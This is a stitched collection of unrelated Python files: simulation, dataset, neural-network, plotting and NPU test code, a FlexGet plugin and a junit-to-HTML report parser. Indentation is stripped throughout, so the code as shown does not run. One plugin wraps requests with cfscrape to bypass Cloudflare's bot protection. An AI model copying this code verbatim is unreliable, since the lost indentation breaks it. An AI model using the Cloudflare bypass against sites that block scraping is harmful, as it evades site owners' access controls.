eps_r=gp['eps_r'], equally_spaced_sample=gp["Equally spaced"])
totalsim=Totalsim(params, gp["min"], gp["max"], gp["istep"], output_fname, gp["Test"])
return totalsim
# def runnewcapsol(input_fname= "capsol.in", output_fname="C-Z.dat"):
# gp=nac.get_gridparameters(input_fname)
# params=ParamsSample(Rtip=gp["Rtip"], theta_deg=gp["half-angle"],
# Hcone=gp["HCone"], Hcant=gp["thickness_Cantilever"],
# Rcant=gp["RCantilever"], zMax=gp["z_max"], rhoMax=gp["rho_max"],
# h0=gp["h0"], d=gp["min"], Nuni=gp["Nuni"], Nr=gp["n"],
# Nz_plus=gp["m+"],hsam=gp["Thickness_sample"],
# eps_r=gp['eps_r'], equally_spaced_sample=gp["equally_spaced_sample"])
# totalsim=Totalsim(params, gp["min"], gp["max"], gp["istep"], output_fname, gp["Test"])
# return totalsim |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A factory-pattern class which returns classification image/label pairs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from datasets import fgvc
datasets_map = {
'ILSVRC2012': {'num_samples': {'train': 1281167, 'validation': 50000},
'num_classes': 1000},
'inat2017': {'num_samples': {'train': 665473, 'validation': 9697},
'num_classes': 5089},
'aircraft': {'num_samples': {'train': 6667, 'validation': 3333},
'num_classes': 100},
'cub_200': {'num_samples': {'train': 5994, 'validation': 5794},
'num_classes': 200},
'flower_102': {'num_samples': {'train': 2040, 'validation': 6149},
'num_classes': 102},
'food_101': {'num_samples': {'train': 75750, 'validation': 25250},
'num_classes': 101},
'nabirds': {'num_samples': {'train': 23929, 'validation': 24633},
'num_classes': 555},
'stanford_cars': {'num_samples': {'train': 8144, 'validation': 8041},
'num_classes': 196},
'stanford_dogs': {'num_samples': {'train': 12000, 'validation': 8580},
'num_classes': 120}
}
def get_dataset(name, split_name, root_dir, file_pattern=None, reader=None):
"""Given a dataset name and a split_name returns a Dataset.
Args:
name: String, the name of the dataset.
split_name: A train/validation split name.
root_dir: The root directory of all datasets.
file_pattern: The file pattern to use for matching the dataset source files.
reader: The subclass of tf.ReaderBase. If left as `None`, then the default
reader defined by each dataset is used.
Returns:
A `Dataset` class.
Raises:
ValueError: If the dataset `name` is unknown.
"""
if name not in datasets_map:
raise ValueError('Name of dataset unknown %s' % name)
return fgvc.get_split(
split_name,
os.path.join(root_dir, name),
datasets_map[name]['num_samples'],
datasets_map[name]['num_classes'],
file_pattern,
reader)
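# Example (hypothetical usage): load the validation split of CUB-200 from a
# local root directory of converted TFRecords. The path below is a placeholder.
def _example_get_dataset():
    return get_dataset('cub_200', 'validation', root_dir='/data/fgvc_tfrecords')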
|
'''
This is the Learning Through Target Spikes (LTTS) repository for code associated with
the paper: Paolo Muratore, Cristiano Capone, Pier Stanislao Paolucci (2020)
"Target spike patterns enable efficient and biologically plausible learning for
complex temporal tasks*" (currently *under review*).
Please give credit to this paper if you use or modify the code in a derivative work.
This work is licensed under the Creative Commons Attribution 4.0 International License.
To view a copy of this license, visit http://creativecommons.org/licenses/by/4.0/
or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.
'''
import numpy as np
from functools import reduce
def kTrajectory (T, K = 3, Ar = (0.5, 2.0), Wr = (1, 2, 3, 5), offT = 0, norm = False):
P = [];
for k in range (K):
A = np.random.uniform (*Ar, size = 4);
W = np.array (Wr) * 2. * np.pi;
F = np.random.uniform (0., 2. * np.pi, size = len (W));
t = np.linspace (0., 1., num = T);
p = 0.
for a, w, f in zip (A, W, F):
p += a * np.cos (t * w + f);
P.append (p);
P = np.array (P);
# Here we normalize our trajectories
P = P / np.max (P, axis = 1).reshape (K, 1) if norm else P;
# Here we zero-out the initial offT entries of target
P [:, :offT] = 0.;
return P;
def kClock (T, K = 5):
C = np.zeros ((K, T));
for k, tick in enumerate (C):
range = T // K;
tick [k * range : (k + 1) * range] = 1;
return C;
def sfilter (seq, itau = 0.5):
filt_seq = np.zeros (seq.shape);
for t, s in enumerate (seq.T):
filt_seq [:, t] = filt_seq [:, t - 1] * itau + s * (1. - itau) if t > 0 else seq [:, 0];
return filt_seq;
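# Example (minimal sketch): sfilter acts as a leaky integrator along the time
# axis, so a single unit spike at t = 0 decays geometrically with factor itau.
def _example_sfilter():
    spike = np.zeros((1, 5))
    spike[0, 0] = 1.0
    return sfilter(spike, itau=0.5)  # -> [[1., 0.5, 0.25, 0.125, 0.0625]]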
def dJ_rout (J_rout, targ, S_rout):
Y = J_rout @ S_rout;
return (targ - Y) @ S_rout.T;
def read (S, J_rout, itau_ro = 0.5):
out = sfilter (S, itau = itau_ro);
return J_rout @ out;
def gaussian (x, mu = 0., sig = 1.):
return np.exp (-np.power (x - mu, 2.) / (2 * np.power (sig, 2.)))
def parityCode (N = 2, off = 10):
def xor(a, b): return a ^ b;
def mask(i, T):
        m = np.zeros (T, dtype = bool);
# Grab the binary representation
bin = [int(c) for c in f'{i:b}'.zfill(N)];
for t, b in enumerate (bin):
m [off * ( 1 + 3 * t) : off * (2 + 3 * t + b)] = True
return m;
# Here we compute the total time needed for this parity code
T = off + 2 * N * off + (N - 1) * off + 2 * off + 3 * off + off;
Inp = np.zeros ((2**N, T));
Out = np.zeros ((2**N, T));
t = np.linspace (0., 3 * off, num = 3 * off);
for i, (inp, out) in enumerate (zip (Inp, Out)):
inp[mask(i, T)] = 1;
sgn = 2 * reduce(xor, [int(c) for c in f'{i:b}']) - 1;
out[-4 * off : -off] = sgn * gaussian(t, mu = 1.5 * off, sig = off * 0.5);
return Inp, Out;
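# Example (minimal sketch): the N-bit parity task produces 2**N input/output
# traces; with N = 2 and the default off = 10 each trace is 120 time steps
# long, and the output bump is positive or negative depending on the XOR parity.
def _example_parity_code():
    Inp, Out = parityCode(N=2)
    return Inp.shape, Out.shape  # -> ((4, 120), (4, 120))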
def shuffle(iter):
rng_state = np.random.get_state();
for a in iter:
np.random.shuffle(a);
np.random.set_state(rng_state);
|
# Copyright (c) 2020 Huawei Technologies Co., Ltd
# Copyright (c) 2019, Facebook CORPORATION.
# All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import numpy as np
import copy
from common_utils import TestCase, run_tests
from common_device_type import dtypes, instantiate_device_type_tests
from util_test import create_common_tensor
class TestAddcdiv(TestCase):
def test_addcdiv(self, device):
def _test_addcdiv(a, alpha, b, c):
actual = torch.addcdiv(a, b, c, value=alpha)
# implementation of addcdiv downcasts alpha. arithmetic ops don't.
if not actual.dtype.is_floating_point:
alpha = int(alpha)
expected = a + (alpha * b) / c
# print(expected)
# print(actual)
self.assertTrue(torch.allclose(expected.to("cpu"), actual.to("cpu"), equal_nan=True))
with self.maybeWarnsRegex(
UserWarning, "This overload of addcdiv is deprecated"):
self.assertEqual(actual.to("cpu"), torch.addcdiv(a, alpha, b, c).to("cpu"))
def non_zero_rand(size, dtype, device):
if dtype.is_floating_point:
a = torch.rand(size=size, dtype=dtype, device="cpu")
a = a.to("npu") # torch.rand()在npu暂未适配
elif dtype == torch.uint8:
a = torch.randint(1, 5, size=size, dtype=dtype, device=device)
else:
a = torch.randint(-5, 5, size=size, dtype=dtype, device=device)
            # return a + (a == 0).type(dtype)  # the add op has issues here, so this stays commented out
return a.type(dtype)
for dtype in torch.testing.get_all_math_dtypes(device):
# print(dtype, " : ", device)
if dtype in [torch.uint8, torch.int8, torch.int16, torch.int32, torch.int64, torch.float64]:
continue
_test_addcdiv(
non_zero_rand((2, 2), dtype=dtype, device=device),
0.5,
non_zero_rand((2, 2), dtype=dtype, device=device),
non_zero_rand((2, 2), dtype=dtype, device=device))
def generate_data(self, min, max, shape, dtype):
input1 = np.random.uniform(min, max, shape).astype(dtype)
input2 = np.random.uniform(min, max, shape).astype(dtype)
input3 = np.random.uniform(min, max, shape).astype(dtype)
        # Convert the numpy.ndarray inputs to torch.Tensor
npu_input1 = torch.from_numpy(input1)
npu_input2 = torch.from_numpy(input2)
npu_input3 = torch.from_numpy(input3)
return npu_input1, npu_input2, npu_input3
def generate_single_data(self, min, max, shape, dtype):
input = np.random.uniform(min, max, shape).astype(dtype)
npu_input = torch.from_numpy(input)
return npu_input
def generate_scalar(self, min, max):
scalar = np.random.uniform(min, max)
return scalar
def generate_int_scalar(self, min, max):
scalar = np.random.randint(min, max)
return scalar
def test_addcdiv_float32(self, device):
def cpu_op_exec(input1, input2, input3, scalar):
output = torch.addcdiv(input1, input2, input3, value=scalar)
return output
def npu_op_exec(input1, input2, input3, scalar):
input1 = input1.to("npu")
input2 = input2.to("npu")
input3 = input3.to("npu")
output = torch.addcdiv(input1, input2, input3, value=scalar)
output = output.to("cpu")
return output
npu_input1, npu_input2, npu_input3 = self.generate_data(1, 100, (5, 3), np.float32)
scalar = self.generate_scalar(1, 10)
cpu_output = cpu_op_exec(npu_input1, npu_input2, npu_input3, scalar)
npu_output = npu_op_exec(npu_input1, npu_input2, npu_input3, scalar)
self.assertEqual(cpu_output, npu_output)
def test_addcdiv_float32_out(self, device):
def cpu_op_exec_out(input1, input2, input3, scalar, input4):
output = input4
torch.addcdiv(input1, input2, input3, value=scalar, out=output)
output = output.numpy()
return output
def npu_op_exec_out(input1, input2, input3, scalar, input4):
input1 = input1.to("npu")
input2 = input2.to("npu")
input3 = input3.to("npu")
output = input4.to("npu")
torch.addcdiv(input1, input2, input3, value=scalar, out=output)
output = output.to("cpu")
output = output.numpy()
return output
npu_input1, npu_input2, npu_input3 = self.generate_data(1, 100, (5, 3), np.float32)
scalar = self.generate_scalar(1, 10)
npu_input4 = self.generate_single_data(1, 100, (5, 3), np.float32)
cpu_output = cpu_op_exec_out(npu_input1, npu_input2, npu_input3, scalar, npu_input4)
npu_output = npu_op_exec_out(npu_input1, npu_input2, npu_input3, scalar, npu_input4)
self.assertEqual(cpu_output, npu_output)
def test_addcdiv_float32_broadcast(self, device):
def cpu_op_exec(input1, input2, input3, scalar):
output = torch.addcdiv(input1, input2, input3, value=scalar)
return output
def npu_op_exec(input1, input2, input3, scalar):
input1 = input1.to("npu")
input2 = input2.to("npu")
input3 = input3.to("npu")
output = torch.addcdiv(input1, input2, input3, value=scalar)
output = output.to("cpu")
return output
npu_input1 = self.generate_single_data(1, 100, (5, 3, 1), np.float32)
npu_input2 = self.generate_single_data(1, 100, (5, 1, 5), np.float32)
npu_input3 = self.generate_single_data(1, 100, (1, 1, 5), np.float32)
scalar = self.generate_scalar(1, 10)
cpu_output = cpu_op_exec(npu_input1, npu_input2, npu_input3, scalar)
npu_output = npu_op_exec(npu_input1, npu_input2, npu_input3, scalar)
# self.assertEqual(cpu_output, npu_output)
self.assertRtolEqual(cpu_output, npu_output)
def test_addcdiv_inp_contiguous_float32(self, device):
def cpu_op_inp_contiguous_exec(input1, input2, input3, scalar):
input1.addcdiv_(input2, input3, value=scalar)
output = input1.numpy()
return output
def npu_op_inp_contiguous_exec(input1, input2, input3, scalar):
input1 = input1.to("npu")
input2 = input2.to("npu")
input3 = input3.to("npu")
input1.addcdiv_(input2, input3, value=scalar)
output = input1.to("cpu")
output = output.numpy()
return output
npu_input1, npu_input2, npu_input3 = self.generate_data(1, 100, (5, 3), np.float32)
cpu_input1 = copy.deepcopy(npu_input1)
cpu_input2 = copy.deepcopy(npu_input2)
cpu_input3 = copy.deepcopy(npu_input3)
scalar = self.generate_int_scalar(1, 10)
cpu_output = cpu_op_inp_contiguous_exec(cpu_input1, cpu_input2, cpu_input3, scalar)
npu_output = npu_op_inp_contiguous_exec(npu_input1, npu_input2, npu_input3, scalar)
self.assertEqual(cpu_output, npu_output)
def test_addcdiv_inp_input1_noncontiguous_float32(self, device):
def cpu_op_inp_input1_noncontiguous_exec(input1, input2, input3, scalar):
input1_strided = input1.as_strided([2, 2], [1, 2], 2)
input1_strided.addcdiv_(input2, input3, value=scalar)
output = input1.numpy()
return output
def npu_op_inp_input1_noncontiguous_exec(input1, input2, input3, scalar):
input1 = input1.to("npu")
input2 = input2.to("npu")
input3 = input3.to("npu")
input1_as_strided = input1.as_strided([2, 2], [1, 2], 2)
input1_as_strided.addcdiv_(input2, input3, value=scalar)
output = input1.to("cpu")
output = output.numpy()
return output
npu_input1 = self.generate_single_data(1, 100, (4, 3), np.float32)
npu_input2 = self.generate_single_data(1, 100, (2, 2), np.float32)
npu_input3 = self.generate_single_data(1, 100, (2, 2), np.float32)
cpu_input1 = copy.deepcopy(npu_input1)
cpu_input2 = copy.deepcopy(npu_input2)
cpu_input3 = copy.deepcopy(npu_input3)
scalar = self.generate_int_scalar(1, 10)
cpu_output = cpu_op_inp_input1_noncontiguous_exec(cpu_input1, cpu_input2, cpu_input3, scalar)
npu_output = npu_op_inp_input1_noncontiguous_exec(npu_input1, npu_input2, npu_input3, scalar)
self.assertEqual(cpu_output, npu_output)
def test_addcdiv_inp_input2_noncontiguous_float32(self, device):
def cpu_op_inp_input2_noncontiguous_exec(input1, input2, input3, scalar):
input2_strided = input2.as_strided([2, 2], [1, 2], 2)
input1.addcdiv_(input2_strided, input3, value=scalar)
output = input1.numpy()
return output
def npu_op_inp_input2_noncontiguous_exec(input1, input2, input3, scalar):
input1 = input1.to("npu")
input3 = input3.to("npu")
input2 = input2.to("npu")
input2_as_strided = input2.as_strided([2, 2], [1, 2], 2)
input1.addcdiv_(input2_as_strided, input3, value=scalar)
output = input1.to("cpu")
output = output.numpy()
return output
npu_input1 = self.generate_single_data(1, 100, (2, 2), np.float32)
npu_input2 = self.generate_single_data(1, 100, (4, 3), np.float32)
npu_input3 = self.generate_single_data(1, 100, (2, 2), np.float32)
cpu_input1 = copy.deepcopy(npu_input1)
cpu_input2 = copy.deepcopy(npu_input2)
cpu_input3 = copy.deepcopy(npu_input3)
scalar = self.generate_int_scalar(1, 10)
cpu_output = cpu_op_inp_input2_noncontiguous_exec(cpu_input1, cpu_input2, cpu_input3, scalar)
npu_output = npu_op_inp_input2_noncontiguous_exec(npu_input1, npu_input2, npu_input3, scalar)
self.assertEqual(cpu_output, npu_output)
def test_addcdiv_inp_input3_noncontiguous_float32(self, device):
def cpu_op_inp_input3_noncontiguous_exec(input1, input2, input3, scalar):
input3_strided = input3.as_strided([2, 2], [1, 2], 2)
input1.addcdiv_(input2, input3_strided, value=scalar)
output = input1.numpy()
return output
def npu_op_inp_input3_noncontiguous_exec(input1, input2, input3, scalar):
input1 = input1.to("npu")
input2 = input2.to("npu")
input3 = input3.to("npu")
input3_as_strided = input3.as_strided([2, 2], [1, 2], 2)
input1.addcdiv_(input2, input3_as_strided, value=scalar)
output = input1.to("cpu")
output = output.numpy()
return output
npu_input1 = self.generate_single_data(1, 100, (2, 2), np.float32)
npu_input2 = self.generate_single_data(1, 100, (2, 2), np.float32)
npu_input3 = self.generate_single_data(1, 100, (4, 3), np.float32)
cpu_input1 = copy.deepcopy(npu_input1)
cpu_input2 = copy.deepcopy(npu_input2)
cpu_input3 = copy.deepcopy(npu_input3)
scalar = self.generate_int_scalar(1, 10)
cpu_output = cpu_op_inp_input3_noncontiguous_exec(cpu_input1, cpu_input2, cpu_input3, scalar)
npu_output = npu_op_inp_input3_noncontiguous_exec(npu_input1, npu_input2, npu_input3, scalar)
self.assertEqual(cpu_output, npu_output)
instantiate_device_type_tests(TestAddcdiv, globals(), except_for="cpu")
if __name__ == "__main__":
run_tests()
|
import csv
import cv2
import numpy as np
import tensorflow as tf
from keras.models import Sequential
from keras.layers import Flatten, Dense, Lambda, Dropout, Cropping2D
from keras.layers.convolutional import Convolution2D
from keras.layers.pooling import MaxPooling2D
def data_import(Filename):
# reading file content
print('Reading file')
samples = []
with open(Filename) as csvfile:
reader = csv.reader(csvfile)
for line in reader:
samples.append(line)
return samples
def Extract_data(samples):
print('Loading the data')
images = []
angles = []
# looping for each line in the csv file
for batch_sample in samples:
        # import the three camera images; the center image also gets a flipped copy
for i in range(3):
#read the image
name = 'data/IMG/'+batch_sample[i].split('/')[-1]
image = cv2.imread(name)
measurment = float(batch_sample[3])
images.append(image)
            # import the angle measurement for the center image and its flip
if i == 0 :
angles.append(measurment)
image_flipped = cv2.flip(cv2.imread(name),1)
images.append(image_flipped)
angles.append(measurment*-1.0)
            # import the angle measurement for the left image (corrected by +0.2)
if i == 1 :
angles.append(measurment+0.2)
            # import the angle measurement for the right image (corrected by -0.2)
if i == 2 :
angles.append(measurment-0.2)
# convert the array to be numpy array
X_train = np.array(images)
y_train = np.array(angles)
return X_train, y_train
def model_design(X_train, y_train):
print('Creating the model')
# model design
model = Sequential()
model.add(Lambda(lambda x: x/255 - 0.5, input_shape=(160, 320, 3)))
model.add(Cropping2D(cropping=((70,25), (0,0))))
model.add(Convolution2D(24, 5, 5, subsample=(2,2), activation='relu'))
model.add(Convolution2D(36, 5, 5, subsample=(2,2), activation='relu'))
model.add(Convolution2D(48, 5, 5, subsample=(2,2), activation='relu'))
model.add(Convolution2D(64, 3, 3, activation='relu'))
model.add(Convolution2D(64, 3, 3, activation='relu'))
model.add(Flatten())
model.add(Dense(100, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(50, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
# compiling the model
model.compile(loss= 'mse', optimizer= 'adam')
model.fit(X_train, y_train, nb_epoch=2, validation_split=0.2, shuffle=True)
# save the model
model.save('model.h5')
# the file name that contain the data
Filename = 'data/driving_log.csv'
#import file content
samples = data_import(Filename)
# read images and measurements
X_train, y_train = Extract_data(samples)
#create and train the model
model_design(X_train, y_train)
|
"""
Write a Python program to compute cumulative sum of numbers of a given list.
Note: Cumulative sum = sum of itself + all previous numbers in the said list.
Sample Output:
[10, 30, 60, 100, 150, 210, 217]
[1, 3, 6, 10, 15]
[0, 1, 3, 6, 10, 15]
"""
def cummulative_sum(num_lists):
    return [sum(num_lists[:i+1]) for i in range(len(num_lists))]
print(cummulative_sum([10, 20, 30, 40, 50, 60, 7]))
print(cummulative_sum([1, 2, 3, 4, 5]))
print(cummulative_sum([0, 1, 2, 3, 4, 5])) |
"""
NCL_panel_41.py
===============
This script illustrates the following concepts:
- Paneling six plots on a page
- Adding a common title to paneled plots using a custom method
- Adding left, center, and right subtitles to a panel plot
- Using a different color scheme to follow `best practices <https://geocat-examples.readthedocs.io/en/latest/gallery/Colors/CB_Temperature.html#sphx-glr-gallery-colors-cb-temperature-py>`_ for visualizations
See following URLs to see the reproduced NCL plot & script:
- Original NCL script: https://www.ncl.ucar.edu/Applications/Scripts/panel_41.ncl
- Original NCL plot: https://www.ncl.ucar.edu/Applications/Images/panel_41_lg.png
"""
##############################################################################
# Import packages:
import cartopy.crs as ccrs
import cartopy.feature as cfeature
from cartopy.mpl.gridliner import LongitudeFormatter, LatitudeFormatter
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.colors as mcolors
import numpy as np
import xarray as xr
import geocat.datafiles as gdf
import geocat.viz.util as gvutil
##############################################################################
# Helper function to convert date into 03-Oct 2000 (00H) format
def convert_date(date):
months = [
'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sept', 'Oct',
'Nov', 'Dec'
]
year = date[:4]
month = months[int(date[5:7]) - 1]
day = date[8:10]
hour = date[11:13]
return day + "-" + month + " " + year + " (" + hour + "H)"
##############################################################################
# Helper function to create and format subplots
def add_axes(fig, grid_space):
ax = fig.add_subplot(grid_space, projection=ccrs.PlateCarree())
# Add land to the subplot
ax.add_feature(cfeature.LAND,
facecolor="none",
edgecolor='black',
linewidths=0.5,
zorder=2)
    # Use geocat.viz.util convenience function to set axes parameters
gvutil.set_axes_limits_and_ticks(ax,
ylim=(-90, 90),
xlim=(-180, 180),
xticks=np.arange(-180, 181, 30),
yticks=np.arange(-90, 91, 30))
# Use geocat.viz.util convenience function to add minor and major tick lines
gvutil.add_major_minor_ticks(ax, labelsize=8)
# Use geocat.viz.util convenience function to make plots look like NCL
# plots by using latitude, longitude tick labels
gvutil.add_lat_lon_ticklabels(ax)
# Remove the degree symbol from tick labels
ax.yaxis.set_major_formatter(LatitudeFormatter(degree_symbol=''))
ax.xaxis.set_major_formatter(LongitudeFormatter(degree_symbol=''))
return ax
##############################################################################
# Read in data:
# Open a netCDF data file using xarray default engine and load the data into xarrays
ds = xr.open_dataset(gdf.get("netcdf_files/rectilinear_grid_2D.nc"))
# Read variables
tsurf = ds.tsurf # surface temperature in K
date = tsurf.time
##############################################################################
# Plot
# Generate figure (set its size (width, height) in inches)
fig = plt.figure(figsize=(12, 11.2), constrained_layout=True)
# Create gridspec to hold six subplots
grid = fig.add_gridspec(ncols=2, nrows=3)
# Add the axes
ax1 = add_axes(fig, grid[0, 0])
ax2 = add_axes(fig, grid[0, 1])
ax3 = add_axes(fig, grid[1, 0])
ax4 = add_axes(fig, grid[1, 1])
ax5 = add_axes(fig, grid[2, 0])
ax6 = add_axes(fig, grid[2, 1])
# Set plot index list
plot_idxs = [0, 6, 18, 24, 30, 36]
# Set contour levels
levels = np.arange(220, 316, 1)
# Set colormap
cmap = plt.get_cmap('magma')
for i, axes in enumerate([ax1, ax2, ax3, ax4, ax5, ax6]):
dataset = tsurf[plot_idxs[i], :, :]
# Contourf plot data
contour = axes.contourf(dataset.lon,
dataset.lat,
dataset.data,
vmin=250,
vmax=310,
cmap=cmap,
levels=levels)
# Add lower text box
axes.text(0.98,
0.05,
convert_date(str(dataset.time.data)),
horizontalalignment='right',
transform=axes.transAxes,
fontsize=8,
bbox=dict(boxstyle='square, pad=0.25',
facecolor='white',
edgecolor='gray'),
zorder=5)
# Set colorbounds of norm
colorbounds = np.arange(249, 311, 1)
# Use cmap to create a norm and mappable for colorbar to be correctly plotted
norm = mcolors.BoundaryNorm(colorbounds, cmap.N)
mappable = cm.ScalarMappable(norm=norm, cmap=cmap)
# Add colorbar for all six plots
fig.colorbar(mappable,
ax=[ax1, ax2, ax3, ax4, ax5, ax6],
ticks=colorbounds[3:-1:3],
drawedges=True,
orientation='horizontal',
shrink=0.82,
pad=0.01,
aspect=35,
extendfrac='auto',
extendrect=True)
# Add figure titles
fig.suptitle("rectilinear_grid_2D.nc", fontsize=22, fontweight='bold')
ax1.set_title("surface temperature", loc="left", fontsize=16, y=1.05)
ax2.set_title("degK", loc="right", fontsize=15, y=1.05)
# Show plot
plt.show()
|
from __future__ import unicode_literals, division, absolute_import
import logging
from flexget import plugin, validator
from flexget.event import event
log = logging.getLogger('cfscraper')
class CFScraper(object):
"""
Plugin that enables scraping of cloudflare protected sites.
Example::
cfscraper: yes
"""
def validator(self):
return validator.factory('boolean')
@plugin.priority(253)
def on_task_start(self, task, config):
try:
import cfscrape
except ImportError as e:
log.debug('Error importing cfscrape: %s' % e)
raise plugin.DependencyError('cfscraper', 'cfscrape', 'cfscrape module required. ImportError: %s' % e)
if config is True:
task.requests = cfscrape.create_scraper(task.requests)
@event('plugin.register')
def register_plugin():
plugin.register(CFScraper, 'cfscraper', api_ver=2)
|
"""
Parse a junit report file into a family of objects
"""
import xml.etree.ElementTree as ET
import collections
from junit2htmlreport import tag
import os
import uuid
class AnchorBase(object):
"""
Base class that can generate a unique anchor name.
"""
def __init__(self):
self._anchor = None
def anchor(self):
"""
Generate a html anchor name
:return:
"""
if not self._anchor:
self._anchor = str(uuid.uuid4())
return self._anchor
class Class(AnchorBase):
"""
A namespace for a test
"""
def __init__(self):
super(Class, self).__init__()
self.name = None
self.cases = list()
def html(self):
"""
Render this test class as html
:return:
"""
cases = [x.html() for x in self.cases]
return """
<hr size="2"/>
<a name="{anchor}">
<div class="testclass">
<div>Test Class: {name}</div>
<div class="testcases">
{cases}
</div>
</div>
</a>
""".format(anchor=self.anchor(),
name=tag.text(self.name),
count=len(cases),
cases="".join(cases))
class Case(AnchorBase):
"""
Test cases
"""
def __init__(self):
super(Case, self).__init__()
self.failure = None
self.failure_msg = None
self.skipped = False
self.skipped_msg = None
self.stderr = None
self.stdout = None
self.duration = 0
self.name = None
self.testclass = None
def failed(self):
"""
Return True if this test failed
:return:
"""
return self.failure is not None
def html(self):
"""
Render this test case as HTML
:return:
"""
failure = ""
        skipped = ""
stdout = tag.text(self.stdout)
stderr = tag.text(self.stderr)
if self.skipped:
skipped = """
<hr size="1"/>
<div class="skipped"><b>Skipped: {msg}</b><br/>
<pre>{skip}</pre>
</div>
""".format(msg=tag.text(self.skipped_msg),
skip=tag.text(self.skipped))
if self.failed():
failure = """
<hr size="1"/>
<div class="failure"><b>Failed: {msg}</b><br/>
<pre>{fail}</pre>
</div>
""".format(msg=tag.text(self.failure_msg),
fail=tag.text(self.failure))
return """
<a name="{anchor}">
<div class="testcase">
<div class="details">
<span class="testname"><b>{testname}</b></span><br/>
<span class="testclassname">{testclassname}</span><br/>
<span class="duration">Time Taken: {duration}s</span>
</div>
{skipped}
{failure}
<hr size="1"/>
<div class="stdout"><i>Stdout</i><br/>
<pre>{stdout}</pre></div>
<hr size="1"/>
<div class="stderr"><i>Stderr</i><br/>
<pre>{stderr}</pre></div>
</div>
</a>
""".format(anchor=self.anchor(),
testname=self.name,
testclassname=self.testclass.name,
duration=self.duration,
failure=failure,
skipped=skipped,
stdout=stdout,
stderr=stderr)
class Suite(object):
"""
Contains test cases (usually only one suite per report)
"""
def __init__(self):
self.name = None
self.duration = 0
self.classes = collections.OrderedDict()
def __contains__(self, item):
"""
Return True if the given test classname is part of this test suite
:param item:
:return:
"""
return item in self.classes
def __getitem__(self, item):
"""
Return the given test class object
:param item:
:return:
"""
return self.classes[item]
def __setitem__(self, key, value):
"""
Add a test class
:param key:
:param value:
:return:
"""
self.classes[key] = value
def all(self):
"""
Return all testcases
:return:
"""
tests = list()
for testclass in self.classes:
tests.extend(self.classes[testclass].cases)
return tests
def failed(self):
"""
Return all the failed testcases
:return:
"""
return [test for test in self.all() if test.failed()]
def skipped(self):
"""
Return all skipped testcases
:return:
"""
return [test for test in self.all() if test.skipped]
def passed(self):
"""
Return all the passing testcases
:return:
"""
return [test for test in self.all() if not test.failed()]
def toc(self):
"""
Return a html table of contents
:return:
"""
fails = ""
skips = ""
if len(self.failed()):
faillist = list()
for failure in self.failed():
faillist.append(
"""
<li>
<a href="#{anchor}">{name}</a>
</li>
""".format(anchor=failure.anchor(),
name=tag.text(
failure.testclass.name + failure.name)))
fails = """
<li>Failures
<ul>{faillist}</ul>
</li>
""".format(faillist="".join(faillist))
if len(self.skipped()):
skiplist = list()
for skipped in self.skipped():
skiplist.append(
"""
<li>
<a href="#{anchor}">{name}</a>
</li>
""".format(anchor=skipped.anchor(),
name=tag.text(
skipped.testclass.name + skipped.name)))
skips = """
<li>Skipped
<ul>{skiplist}</ul>
</li>
""".format(skiplist="".join(skiplist))
classlist = list()
for classname in self.classes:
testclass = self.classes[classname]
cases = list()
for testcase in testclass.cases:
if "pkcs11" in testcase.name:
assert True
cases.append(
"""
<li>
<a href="#{anchor}">{name}</a>
</li>
""".format(anchor=testcase.anchor(),
name=tag.text(testcase.name)))
classlist.append("""
<li>
<a href="#{anchor}">{name}</a>
<ul>
{cases}
</ul>
</li>
""".format(anchor=testclass.anchor(),
name=testclass.name,
cases="".join(cases)))
return """
<ul>
{failed}
{skips}
<li>All Test Classes
<ul>{classlist}</ul>
</li>
</ul>
""".format(failed=fails,
skips=skips,
classlist="".join(classlist))
def html(self):
"""
Render this as html.
:return:
"""
classes = list()
for classname in self.classes:
classes.append(self.classes[classname].html())
return """
<div class="testsuite">
<h2>Test Suite: {name}</h2>
<table>
<tr><th align="left">Duration</th><td align="right">{duration} sec</td></tr>
<tr><th align="left">Test Cases</th><td align="right">{count}</td></tr>
<tr><th align="left">Failures</th><td align="right">{fails}</td></tr>
</table>
<a name="toc"></a>
<h2>Results Index</h2>
{toc}
<hr size="2"/>
<h2>Test Results</h2>
<div class="testclasses">
{classes}
</div>
</div>
""".format(name=tag.text(self.name),
duration=self.duration,
toc=self.toc(),
classes="".join(classes),
count=len(self.all()),
fails=len(self.failed()))
class Junit(object):
"""
Parse a single junit xml report
"""
def __init__(self, filename):
"""
Parse the file
:param filename:
:return:
"""
self.filename = filename
self.tree = ET.parse(filename)
self.suite = None
self.process()
self.css = "report.css"
def get_css(self):
"""
Return the content of the css file
:return:
"""
thisdir = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(thisdir, self.css), "rb") as cssfile:
return cssfile.read()
def process(self):
"""
populate the report from the xml
:return:
"""
root = self.tree.getroot()
assert root.tag == "testsuite"
self.suite = Suite()
self.suite.name = root.attrib["name"]
self.suite.duration = float(root.attrib.get("time", '0'))
for testcase in root:
assert testcase.tag == "testcase"
if testcase.attrib["classname"] not in self.suite:
testclass = Class()
testclass.name = testcase.attrib["classname"]
if not testclass.name:
testclass.name = "no-classname-set"
self.suite[testclass.name] = testclass
newcase = Case()
newcase.name = testcase.attrib["name"]
newcase.testclass = testclass
newcase.duration = float(testcase.attrib["time"])
testclass.cases.append(newcase)
# does this test case have any children?
for child in testcase:
if child.tag == "skipped":
newcase.skipped = child.text
if "message" in child.attrib:
newcase.skipped_msg = child.attrib["message"]
